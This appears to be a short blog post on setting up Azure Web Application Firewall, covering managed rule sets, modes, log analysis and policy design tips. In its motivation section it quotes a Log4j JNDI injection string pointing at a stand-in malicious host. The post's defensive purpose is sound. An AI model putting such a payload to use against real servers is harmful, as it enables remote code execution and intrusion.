This week let’s see how to implement Azure WAF
Why you need WAF ?
- One of the most vulnerable resources in your environment is the web Application that is internet-facing.
- It is an easy target for the actors as they can be easily accessed via Public URL.
- All they need is to find the vulnerability and start penetrating. Recent example, Log4j where you can RCE using JNDI “${jndi:ldap://malicious.com/file}“
What is Azure WAF ?
- Azure WAF can be implemented along with Application Gateway (Regional resource), Front Door (Global resource) and also via CDN. (Note:- we will talking about WAF v2 features in this blog, as it the latest version also contains better security features compared to v1)
- Azure WAF uses Managed Rule sets at the backend. Managed Rule sets are derived from Modsecurity CRS (Link)
- To tune WAF as per requirement, we can use Custom Rule, Exclusions.
- It works in two Modes Detention “logs and matches the request ” and Prevention “logs and blocks the request based on the Managed rule set”
How to Implement WAF ?
- First thing to do , Is to understand the application. Few brain storming questions
- What are the backends and what is the criticality?
- What programming language is used to develop the applications?
- Once you have mapped it out, Start analyzing the application behaviour using Firewall Logs and Application Access Logs (For this you need to diagnostics logs enabled for your AppGW/Front Door)
- you can use the workbooks Workbook – AppGw WAF Triage Workbook and Workbook – WAF Monitor Workbook during this activity
- Post this task, start designing the WAF policy. you need to decide couple of things,
- Is it going to be Global policy or Per Site or Per URI?
- What are my exclusion or custom going to be (Note exclusion has a limit of 40 and 100 for custom rules)?
- Best Practice Tips
- Use more granular policy as much as possible
- Enable only required Managed rules sets for the policy
- Integrate WAF with SIEM for automated Incident response
Leave a comment